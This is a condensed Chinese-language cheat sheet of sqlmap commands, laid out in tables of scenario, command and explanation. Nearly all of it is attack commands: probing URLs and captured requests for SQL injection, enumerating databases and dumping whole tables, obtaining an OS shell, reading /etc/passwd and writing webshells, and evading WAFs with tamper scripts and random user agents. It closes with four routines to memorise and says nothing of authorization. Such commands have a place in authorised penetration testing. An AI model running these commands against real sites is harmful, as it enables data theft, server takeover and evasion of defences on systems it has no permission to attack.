sqlmap命令-精简版

💎 一、快速上手
基础检测三板斧，适用于大多数场景。

场景 命令示例 说明
GET检测 sqlmap -u "http://test.com/page?id=1" 最基础用法，检测URL参数。
POST检测 sqlmap -u "http://test.com/login" --data="user=1&pass=2" 检测POST表单数据。
加载请求 sqlmap -r burp包.txt 从Burp Suite或浏览器复制的请求文件中加载，避免手动拼接Cookie和参数。

📁 二、信息枚举
一旦确认注入点，使用以下链条获取数据。

目的 命令示例 作用
查库 sqlmap -u "URL" --dbs 列出所有数据库。
查表 sqlmap -u "URL" -D 数据库名 --tables 查指定库下的表名。
查字段 sqlmap -u "URL" -D 数据库名 -T 表名 --columns 查指定表下的字段名。
脱裤 sqlmap -u "URL" -D 数据库名 -T 表名 --dump 最常用：获取整张表的数据，非常耗时。

🚀 三、高级与提权
用于深度利用或绕过限制。

目的 命令示例 说明
GetShell sqlmap -u "URL" --os-shell 获取系统交互式Shell，需要高权限（如DBA）且知道网站路径。
文件操作 --file-read="/etc/passwd" 或 --file-write 读取服务器文件或写入Webshell。
绕过WAF sqlmap -u "URL" --tamper=space2comment --random-agent 使用脚本绕过过滤，并随机User-Agent，减少被拦截风险。

⚙️ 四、效率与调试
控制扫描行为。

目的 命令示例 依据
自动确认 --batch 跳过所有交互式询问，使用默认选项，适合批量扫描。
探测等级 --level=3 --risk=2 level越高检测越广（如Header），risk越高越危险（如OR语句）。
延迟限速 --delay=1 --threads=5 --delay避免请求过快被封锁，--threads加速（需谨慎）。
调试信息 -v 3 显示详细的Payload和HTTP请求/响应，用于调试注入点。

📝 五、记住这四个套路即可
快速探测：
sqlmap -r req.txt --batch

获取数据：
sqlmap -r req.txt -D 库名 -T 表名 --dump

高权限写入：
sqlmap -r req.txt --os-shell

遇WAF绕过：
sqlmap -r req.txt --tamper=常用的脚本名 --random-agent